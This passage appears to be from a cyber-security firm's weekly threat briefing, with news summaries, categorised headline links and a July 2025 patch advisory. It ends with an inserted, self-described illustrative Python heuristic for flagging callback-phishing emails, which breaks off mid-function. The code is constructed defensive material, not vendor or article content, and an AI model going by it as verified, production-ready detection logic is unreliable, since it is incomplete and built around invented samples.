Marks & Spencer’s Chairman has called for mandatory reporting of serious cyber attacks to the UK’s National Cyber Security Centre, highlighting that major incidents often go unreported. Following a recent attack on the retailer by a group posing as contractors, key systems including contactless payments and click-and-collect were disrupted. While stores stayed open, online clothing orders were only resumed after 46 days. M&S has estimated the cost of the incident at £300 million. The NCSC described the attack as a wake-up call, warning that other organisations remain at risk unless reporting and response practices improve.
https://cybernews.com/security/should-uk-companies-be-required-to-disclose-major-cyberattacks/
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy
Many businesses remain vulnerable to disruption due to a lack of formal continuity planning. With growing risks from cyber attacks, supply chain issues, and global instability, resilience is now a strategic necessity, not a back-office function. Despite rapid digital transformation, many organisations have yet to embed risk management into everyday operations, leaving them exposed to operational delays and reputational damage. Continuity today is about endurance, not just recovery. Firms that integrate scenario planning, agile governance, and proactive risk oversight are better placed to absorb shocks, maintain customer trust, and adapt quickly in a volatile market.
Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites
Okta has identified that cyber criminals are using generative AI tools like v0.dev to rapidly create convincing phishing websites that mimic legitimate login pages. These sites are often hosted on trusted infrastructure, increasing the risk of users being deceived. The accessibility of AI tools has significantly lowered the skill required to launch such attacks, and open-source guides are further enabling this trend. Okta advises that traditional training alone is no longer sufficient, and organisations should adopt stronger controls such as multi-factor authentication and domain-based protections to defend against these evolving threats.
The Rising Threat of Mobile Malware: How to Protect Your Device in 2025
The rapid growth in smartphone use, expected to reach 7.2 billion users by 2025, has created an expanding target for cyber criminals. Mobile malware is rising sharply, with over 12 million attacks blocked in the first half of 2025 alone. The most common threats include trojans, spyware, adware, and ransomware, often disguised as legitimate apps or delivered via phishing messages. Official app stores are not immune, with some malicious apps reaching over 60 million downloads. Senior leaders should ensure mobile security policies are enforced across their organisations, including app vetting, operating system updates, and user awareness to reduce risk exposure.
https://cybernews.com/security/the-rising-threat-of-mobile-malware/
Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025
Kaspersky has reported that nearly 8,500 small and medium-sized businesses have faced cyber attacks in 2025 through fake downloads of widely used tools like Zoom, Microsoft Office, and newer AI platforms such as ChatGPT and DeepSeek. Attackers are increasingly disguising malicious software as popular apps, exploiting the rise in remote work and interest in artificial intelligence. Notably, files mimicking Zoom alone accounted for 41 percent of all cases observed. These threats often aim to steal login credentials or deliver malware through phishing emails and fake websites. Kaspersky advises SMBs to adopt robust cyber security practices, including verified software downloads, clear usage policies, and regular data backups.
https://www.dawn.com/news/1921871
Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say
UK MPs have warned that hostile states are increasingly using “grey zone” tactics such as cyber attacks, disinformation, sabotage and espionage to destabilise the UK without triggering formal conflict. A parliamentary report calls for a “whole of society” response, involving schools, businesses and communities alongside government. The Defence Committee stressed that these threats affect everyday life and target national infrastructure and digital systems. To address this, MPs are urging greater investment in cyber skills, public awareness, and infrastructure protection, as well as a new homeland security minister to coordinate efforts across sectors and strengthen national resilience.
https://uk.news.yahoo.com/whole-society-must-respond-threats-230100347.html
Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions
Geopolitical tensions are driving a marked increase in cyber attacks from state-backed groups, terrorists, and politically motivated actors. A recent GlobalData report warns that organisations, particularly those involved in critical national infrastructure, are facing heightened risks from espionage and disruption campaigns. Nearly 60% of businesses now shape their cyber security response around geopolitical developments. Complex global supply chains further compound this risk, with suppliers often lacking robust cyber defences. Supply chain attacks are becoming more frequent and harder to contain, taking over 300 days on average to identify and resolve, significantly longer than other types of data breaches.
https://www.verdict.co.uk/businesses-at-greater-risk-of-cyberattack-due-to-geopolitical-tensions/
Governance, Risk and Compliance
Many workers wouldn't tell their bosses if they'd been hit by a cyber attack | TechRadar
Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur
Comms Business - MSPs relied on more than ever for cyber security, finds report
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro
Technology outpaces security adaptation, says Bitdefender
Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar
Many companies are still failing to budget for cyber security | TechRadar
Cyber insurance confronts the age of intelligent threats | Insurance Business America
SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Attacks Spike Despite Gang Closure - IT Security Guru
‘No honour among thieves’: M&S hacking group starts turf war
Should UK companies be required to disclose major cyber attacks? | Cybernews
Ransomware Groups Multiply as Attack Surface Rapidly Expands, GuidePoint Security Finds
Hunters International Ransomware Is Not Shutting Down, It’s Rebranding - Infosecurity Magazine
Iranian ransomware crew promises big bucks for US attacks • The Register
Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine
AiLock ransomware: What you need to know | Fortra
Unmasking the SafePay Ransomware Group - Infosecurity Magazine
SafePay Ransomware Surge Tend to Target Key Sectors
Short-lived ransomware group SatanLock to close down and leak data - BetaNews
New Bert Ransomware Group Strikes Globally with Multiple Variants - Infosecurity Magazine
Ransomware Victims
M&S shares sink lower after failing to recover from cyber attack
Cyber attack on M&S involved 'sophisticated impersonation', chairman says | Money News | Sky News
Should UK companies be required to disclose major cyber attacks? | Cybernews
Qantas data breach shows compliance doesn’t always mean protection and resilience | The Strategist
M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian
UK companies should have to disclose major cyber attacks, M&S says | Reuters
Four arrested in connection with M&S and Co-op cyber attacks - BBC News
Venture capital giant IdeaLab confirms breach, says private data was stolen in attack | TechRadar
Suspected Scattered Spider domains target multiple sectors • The Register
Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine
How M&S responds to its cyber-attack could have a serious impact on its future – and its customers
M&S chair refuses to discuss paying off cyber attackers | The Grocer
Hacker leaks Telefónica data allegedly stolen in a new breach
Qantas is being extorted in recent data-theft cyber attack
Ingram Micro Suffers Huge Ransomware Attack
IT Giant Ingram Micro Reveals Ransomware Breach - Infosecurity Magazine
Louis Vuitton says customer data was leaked following cyber attack | TechRadar
How cyber insurers are stepping up after M&S attack - Insurance Post
Qantas confirms data breach impacts 5.7 million customers
Ingram Micro Up and Running After Ransomware Attack
Customer, Employee Data Exposed in Nippon Steel Breach
Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News
Phishing & Email Based Attacks
Experts warn this top GenAI tool is being used to build phishing websites | TechRadar
New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data
Cyber crooks jump on .es domain for credential phishing trip • The Register
Phishing Scams Can Deceive Large Language Models | Security Magazine
Identity attacks surge 156% as phishermen get craftier • The Register
Experts flag a huge amount of cyber attacks coming from this unexpected domain | TechRadar
A Clever Russian Phishing Attack Using Fake State Department Employees
Human rights body hooked by phishing scam - Newsroom
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian
M&S turned to FBI for help after ‘traumatic’ cyber attack
Browser Exploits Wane as Users Become the Attack Surface
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S
Fraud, Scams and Financial Crime
Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe
Hundreds of Malicious Domains Registered Ahead of Prime Day - Infosecurity Magazine
BaitTrap: Over 17,000 Fake News Websites Caught Fueling Investment Fraud Globally
SIM Swap Fraud Is Surging — and That's a Good Thing
eSIM Hack Allows for Cloning, Spying - SecurityWeek
How to protect your cell phone number from SIM swap attacks | TechCrunch
New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data
Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan
Visa's 24/7 war room takes on global cyber criminals
Human rights body hooked by phishing scam - Newsroom
PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET
Artificial Intelligence
Experts warn this top GenAI tool is being used to build phishing websites | TechRadar
Employees are quietly bringing AI to work and leaving security behind - Help Net Security
Phishing Scams Can Deceive Large Language Models | Security Magazine
The Wild West of Agentic AI - An Attack Surface CISOs Can’t Afford to Ignore - SecurityWeek
Security practices must evolve to battle growing deepfake sophistication - SiliconANGLE
AI Security Institute targets cyber crime in hiring push - UKTN
The four-phase security approach to keep in mind for your AI transformation | TechRadar
It’s time to give AI security its own playbook and the people to run it - Help Net Security
Leveraging cyber security to establish trade secret protection in the age of AI - IAM
What Can Businesses Do About Ethical Dilemmas Posed by AI? - SecurityWeek
What Security Leaders Need to Know About AI Governance for SaaS
What CISOs Need to Know About AI Governance Frameworks | TechTarget
AI Accelerates Security Risks in Broken Data Environments
AI built it, but can you trust it? - Help Net Security
SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools
Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
Google Cloud keeps AI data in UK, but not the support • The Register
2FA/MFA
The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It
Malware
SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools
Weaponized Versions of PuTTY and WinSCP Attacking IT Admins Via Search Results
Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine
Atomic macOS infostealer adds backdoor for persistent attacks
Chrome Store Features Extension Poisoned With Sophisticated Spyware
Hackers abuse leaked Shellter red team tool to deploy infostealers
Chrome, Edge users infected by 18 malicious extensions | Cybernews
Browser hijacking campaign infects 2.3M Chrome, Edge users • The Register
Russia-linked macOS malware adds dangerous backdoor| Cybernews
200+ browser extensions make a web-scraping botnet | PCWorld
Open source has a malware problem, and it's getting worse - Help Net Security
Bots/Botnets
200+ browser extensions make a web-scraping botnet | PCWorld
Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar
Mobile
eSIM Hack Allows for Cloning, Spying - SecurityWeek
How to protect your cell phone number from SIM swap attacks | TechCrunch
The rising threat of mobile malware | Cybernews
Invisible UI flaw gives hackers full Android access | Cybernews
5 critical reasons why keeping your android security updates current is more important than ever
How to detect and fix a jailbroken iPhone | TechTarget
Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET
Denial of Service/DoS/DDoS
The DDoS smoke screen: why restoring uptime may be your first mistake | TechRadar
Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks
Internet of Things – IoT
Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar
Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek
PerfektBlue Bluetooth attack allows hacking infotainment systems of Mercedes, Volkswagen, and Skoda
Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine
Data Breaches/Leaks
Know Your Enemy: Understanding Dark Market Dynamics
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
Hacker leaks Telefónica data allegedly stolen in a new breach
Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News
Bitcoin Depot breach exposes data of nearly 27,000 crypto users
Cyber criminals stealing more data; Privacy watchdog concerned | NL Times
Louis Vuitton says customer data was leaked following cyber attack | TechRadar
Qantas confirms data breach impacts 5.7 million customers
Customer, Employee Data Exposed in Nippon Steel Breach
South Korea Imposes Penalties on SK Telecom for Breach
How Worried Should Consumers Really Be After a Data Breach? - Infosecurity Magazine
Your data privacy is slipping away – here’s why, and what you can do about it
Organised Crime & Criminal Actors
Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe
‘No honour among thieves’: M&S hacking group starts turf war
Know Your Enemy: Understanding Dark Market Dynamics
Cyber criminals stealing more data; Privacy watchdog concerned | NL Times
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
US Secret Service unmasks $400M crypto scam network
Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan
Bitcoin Depot breach exposes data of nearly 27,000 crypto users
Insider Risk and Insider Threats
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S
IT Worker arrested for selling access in $100M PIX cyber heist
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard
Insurance
How cyber insurers are stepping up after M&S attack - Insurance Post
Cyber insurance confronts the age of intelligent threats | Insurance Business America
Supply Chain and Third Parties
Financial firms are locking the front door but leaving the back open - Help Net Security
Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar
Global software supply chain visibility remains critically low - Help Net Security
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro
Cloud/SaaS
What Security Leaders Need to Know About AI Governance for SaaS
Google Cloud keeps AI data in UK, but not the support • The Register
Cloud security maintains its position as top spending priority - Help Net Security
Outages
Microsoft Outlook goes down around the world - here's what we know | ZDNET
Identity and Access Management
Identity attacks surge 156% as phishermen get craftier • The Register
Identity-related cyber incidents surge, report finds | SC Media
Is the UK falling behind Europe on digital identity security? | Biometric Update
Encryption
EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine
Linux and Open Source
Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine
Open source has a malware problem, and it's getting worse - Help Net Security
New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu
SUSE launches new European digital sovereignty support service to meet surging demand | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
How passkeys work: Do your favorite sites even support passkeys? | ZDNET
How passkeys work: The complete guide to your inevitable passwordless future | ZDNET
Social Media
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Regulations, Fines and Legislation
NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times
NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra
Czech Republic in Finale of NIS 2 Transposition
EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine
South Korea Imposes Penalties on SK Telecom for Breach
What CISOs Need to Know About AI Governance Frameworks | TechTarget
CISOs urged to fix API risk before regulation forces their hand - Help Net Security
US Cyber Security at Risk Without Congressional Action
Trump seeks unprecedented $1.23 billion cut to federal cyber budget | CSO Online
Models, Frameworks and Standards
NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times
NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra
Czech Republic in Finale of NIS 2 Transposition
Why law firms should get LOCS:23 certified - Legal Futures
Data Protection
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Your data privacy is slipping away – here’s why, and what you can do about it
Careers, Working in Cyber and Information Security
Cyber security’s mental health reckoning - Tech Monitor
Why your security team feels stuck - Help Net Security
Will AI Gut the Cyber Security Talent Pipeline?
Hiring trends report | Professional Security Magazine
How to Get a Job in Cyber Security | The Global Recruiter
Law Enforcement Action and Take Downs
Four arrested in connection with M&S and Co-op cyber attacks - BBC News
Teens arrested by NCA over cyber attacks on M&S, Harrods and Co-op
US Secret Service unmasks $400M crypto scam network
Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
Suspected Hacker Linked to Silk Typhoon Arrested in Milan
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
French cops cuff Russian hoopster for alleged ransomware • The Register
Is This Russian Basketball Player Part of a Ransomware Gang?
IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Alleged Chinese hacker tied to Silk Typhoon arrested for cyber espionage
Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict
UK and France unite against increasing cyber threats
Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent
Grey zone attacks are bringing conflict to Britain’s doorstep — it’s time we woke up to... - LBC
Whole of society must respond to threats bringing ‘war to the doorstep’, MPs say
Teach children how to catch Russian spies online, MPs told
Hostile activities bring war to the doorstep of each and every one of us, new report warns
Nation State Actors
China
Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
Suspected Hacker Linked to Silk Typhoon Arrested in Milan
North American APT Uses Exchange Zero-Day to Attack China
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine
Taiwan Flags Chinese Apps Over Data Security Violations - Infosecurity Magazine
Taiwan NSB Alerts Public on Data Risks from TikTok, Weibo, and RedNote Over China Ties
Chinese State-Sponsored Hacker Charged Over COVID-19 Research Theft - Infosecurity Magazine
NightEagle APT Exploits Microsoft Exchange Flaw to Target China's Military and Tech Sectors
Russia
Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent
Teach children how to catch Russian spies online, MPs told
Russia-linked macOS malware adds dangerous backdoor| Cybernews
Russia Launches Spy Ship to Target NATO Undersea Cables — UNITED24 Media
Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
French cops cuff Russian hoopster for alleged ransomware • The Register
A Clever Russian Phishing Attack Using Fake State Department Employees
Looking Tough: Russia Trumpets Pro-Ukraine Hacker Arrests
Russia rejects ethical hacking bill • The Register
Spyware Campaign Hits Russian Industrial Firms
Russian airports crippled as 171 Moscow flights canceled
Researchers Uncover Batavia Windows Spyware Stealing Documents from Russian Firms
Iran
UK faces rising and unpredictable threat from Iran, report warns
Rising threat of assassination and kidnap attempts by Iran in UK – Channel 4 News
Iranian ransomware crew promises big bucks for US attacks • The Register
Missiles go silent but Iran-Israel cyber war is just ramping up | Iran International
The Iran-Israel War Returns to the Shadows, for Now
North Korea
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S
US sanctions alleged North Korean IT sweatshop leader • The Register
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
DoNot APT is expanding scope targeting European foreign ministries
TAG-140 Deploys DRAT V2 RAT, Targeting Indian Government, Defence, and Rail Sectors
Tools and Controls
FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur
The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It
Technology outpaces security adaptation, says Bitdefender
Many companies are still failing to budget for cyber security | TechRadar
LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine
Vibe Hacking Not Yet Possible - InfoRiskToday
CISOs urged to fix API risk before regulation forces their hand - Help Net Security
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Hackers abuse leaked Shellter red team tool to deploy infostealers
AI built it, but can you trust it? - Help Net Security
Will AI Gut the Cyber Security Talent Pipeline?
How passkeys work: The complete guide to your inevitable passwordless future | ZDNET
Cloud security maintains its position as top spending priority - Help Net Security
Cyber insurance confronts the age of intelligent threats | Insurance Business America
PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET
Other News
Data sovereignty is now a cyber security imperative - Tech Monitor
FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)
Technology outpaces security adaptation, says Bitdefender
Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times
SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times
Cyber attacks could exploit home solar panels to disrupt power grids | New Scientist
Vulnerability Management
LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine
Vibe Hacking Not Yet Possible - InfoRiskToday
End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online
5 critical reasons why keeping your android security updates current is more important than ever
Vulnerabilities
Microsoft Patches 130 Vulnerabilities, Including Critical Flaws in SPNEGO and SQL Server
End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online
Invisible UI flaw gives hackers full Android access | Cybernews
Ivanti, Fortinet, Splunk Release Security Updates - SecurityWeek
AMD warns of new Meltdown, Spectre-like bugs affecting CPUs • The Register
New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu
Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks
CISA Adds Four Critical Vulnerabilities to KEV Catalog Due to Active Exploitation
ServiceNow Flaw CVE-2025-3648 Could Lead to Data Exposure via Misconfigured ACLs
Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek
Microsoft Confirms Windows 11 Update Causes Security Firewall Error
Unpatched Ruckus Vulnerabilities Allow Wireless Environment Hacking - SecurityWeek
Critical mcp-remote Vulnerability Enables Remote Code Execution, Impacting 437,000+ Downloads
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 09 July 2025 – Security Updates from Microsoft, Ivanti, Fortinet, Splunk, Adobe, and SAP
Executive Summary
Microsoft’s July 2025 Patch Tuesday addressed 137 vulnerabilities, including a publicly disclosed zero-day in SQL Server, 14 critical issues (primarily remote code execution) in Office and Windows components, and a range of privilege escalation, information disclosure, denial-of-service, and spoofing flaws affecting Office and Office Components, .NET and Visual Studio, Azure, Teams, Hyper-V, Windows BitLocker, Microsoft Edge (Chromium-based), and the Windows Cryptographic Service.
Ivanti released advisory AV25‑405 on 8 July, fixing 11 vulnerabilities across Connect Secure (ICS), Policy Secure (IPS), Endpoint Manager (EPM), and Endpoint Manager Mobile (EPMM), including high-severity flaws that impact authentication, credential decryption, and OS command injection.
Fortinet published eight security advisories covering one critical, one high, five medium, and one low severity vulnerabilities affecting FortiAnalyzer, FortiProxy, FortiOS, FortiSandbox, FortiVoice, and FortiWeb.
Splunk this week issued 12 advisories that resolve critical and high-severity flaws in third-party dependencies in Splunk SOAR, Enterprise, and DB Connect. Additionally, the company announced fixes for seven medium- and one low-severity issue in Splunk Enterprise.
Adobe announced the rollout of security fixes for 58 vulnerabilities across 13 products, including three critical-severity flaws in Adobe Connect, ColdFusion, and Experience Manager Forms (AEM Forms) on JEE.
SAP announced the release of 27 new and four updated security notes as part of its July 2025 Security Patch Day, including six that address critical vulnerabilities.
What’s the risk to me or my business?
This month’s releases cover major vendor ecosystems and include both publicly disclosed and critical vulnerabilities. Unpatched systems are vulnerable to SQL Server information disclosure, Office/Windows RCEs, credential decryption in Ivanti, command injection in Fortinet devices, package-level compromises in Splunk SOAR, Adobe application attacks, and insecure deserialization in SAP, which can lead to full system compromise or data breaches.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on the specific updates in this Microsoft Patch Tuesday release can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul
Ivanti, Fortinet, Splunk, Adobe, SAP
Further details of the vulnerabilities in the affected Ivanti, Fortinet, Splunk, Adobe and SAP products:
https://www.ivanti.com/blog/july-security-update-2025
https://www.fortiguard.com/psirt
https://advisory.splunk.com/advisories/SVD-2025-0712
https://helpx.adobe.com/security.html
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 04 July 2025
Black Arrow Cyber Threat Intelligence Briefing 04 July 2025:
-Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
-You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads
-90% Aren’t Ready for AI Attacks, Are You?
-Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
-Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers
-Third-Party Breaches Double, Creating Ripple Effects Across Industries
-Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches
-A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now
-Scam Centres Expand Global Footprint with Trafficked Victims
-The SMB Wake-Up Call: Downtime, Dollars, and Data Loss
-Many Global Execs Identify Cyber Risk as Top Concern, Beazley
-Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence
-Rethinking Cyber Risk as Traditional Models Fall Short
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, we begin our review with details of evolving cyber attacks that organisations should address in managing their risks. Attackers are impersonating trusted brands through phishing emails containing PDF attachments and phone numbers for fake support centres, while others are targeting the routers used in homes and small offices. The cyber risks of using AI are also developing, including AI chatbots that present malicious links to users. Attackers are successfully gaining access to victims’ data and systems through third parties the victims work with, such as the recently disclosed attack at Qantas.
We share details of other attack tactics, including those used by the highly active Scattered Spider group, the emergence of scam centres around the world, and the use of automated scanning and mass exploitation of security flaws. We conclude with the perspective of business leaders, noting a sharp rise in executives naming cyber risk as their main concern, at a time when over 60% of UK organisations hit by incidents suffered downtime as a result.
We find that a key element of successful cyber security begins with a leadership team that understands and is confident in managing their own cyber risks. This requires a boardroom-level conversation on contemporary cyber risks and how to govern them proportionately. Contact us for details of our Senior Leadership Risk and Governance Workshops.
Top Cyber Stories of the Last Week
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
Cyber security experts have uncovered phishing campaigns using fake emails with PDF attachments to impersonate trusted brands like Microsoft and DocuSign. These emails coax victims into scanning QR codes or calling fake support numbers, leading to credential theft or malware installation. Attackers exploit the trust placed in phone calls and use scripted tactics to appear legitimate. Additionally, criminals are manipulating artificial intelligence responses and compromising reputable websites to direct users to malicious sites. These developments highlight how cyber criminals are combining social engineering with new technologies to broaden their attacks and undermine brand trust.
https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
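Added example (not code from the article or from any vendor): a small Python triage heuristic for the callback-phishing pattern described above. It flags a message that names a brand in the display name or subject while sending from a domain that brand does not use, carries a PDF, and pushes the reader to phone a number or scan a QR code. The official-domain table, the sample messages and the attachment text are all constructed for illustration; in a real pipeline the PDF text would come from a PDF-to-text step in your mail gateway.

```python
"""Heuristic triage for callback phishing: a brand-impersonating email carrying
a PDF that tells the reader to phone a number or scan a QR code.
Added example, not code from the original article. The sender-domain table and
the sample messages below are constructed for illustration."""
import re
from dataclasses import dataclass, field

# Assumption: brands worth protecting and the domains they legitimately send from.
# In production this table comes from your own mail-flow baseline.
OFFICIAL_SENDER_DOMAINS = {
    "microsoft": {"microsoft.com", "email.microsoft.com"},
    "docusign": {"docusign.com", "docusign.net"},
}

# Deliberately loose phone pattern (US/UK style, optional country code and punctuation).
PHONE_RE = re.compile(r"(?:\+?\d{1,3}[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
# "call ... support / billing / cancel / refund" within 40 characters.
CALLBACK_RE = re.compile(
    r"\b(call|dial|phone|contact)\b.{0,40}\b(support|helpdesk|help desk|billing|cancel|refund)\b",
    re.I,
)
QR_RE = re.compile(r"\b(qr code|scan (?:the|this) code)\b", re.I)


@dataclass
class Message:
    display_name: str
    sender: str               # envelope/From address, e.g. billing@example.net
    subject: str
    body: str
    attachments: dict = field(default_factory=dict)  # filename -> extracted text


def sender_domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def is_official(domain: str, brand: str) -> bool:
    # Exact match or subdomain; the leading dot stops "notmicrosoft.com" matching.
    return any(domain == d or domain.endswith("." + d) for d in OFFICIAL_SENDER_DOMAINS[brand])


def impersonated_brand(msg: Message):
    """Return a brand named in the display name or subject whose domains the
    sender does not belong to, or None."""
    haystack = f"{msg.display_name} {msg.subject}".lower()
    dom = sender_domain(msg.sender)
    for brand in OFFICIAL_SENDER_DOMAINS:
        if brand in haystack and not is_official(dom, brand):
            return brand
    return None


def score(msg: Message):
    """Additive score plus the reasons that fired; 3 or more deserves a human look."""
    reasons = []
    brand = impersonated_brand(msg)
    if brand:
        reasons.append(f"brand '{brand}' in header but sender domain is {sender_domain(msg.sender)}")
    pdf_text = " ".join(t for n, t in msg.attachments.items() if n.lower().endswith(".pdf"))
    if pdf_text:
        reasons.append("PDF attachment")
    text = f"{msg.body} {pdf_text}"
    if PHONE_RE.search(text):
        reasons.append("phone number present")
    if CALLBACK_RE.search(text):
        reasons.append("call-us-to-resolve wording")
    if QR_RE.search(text):
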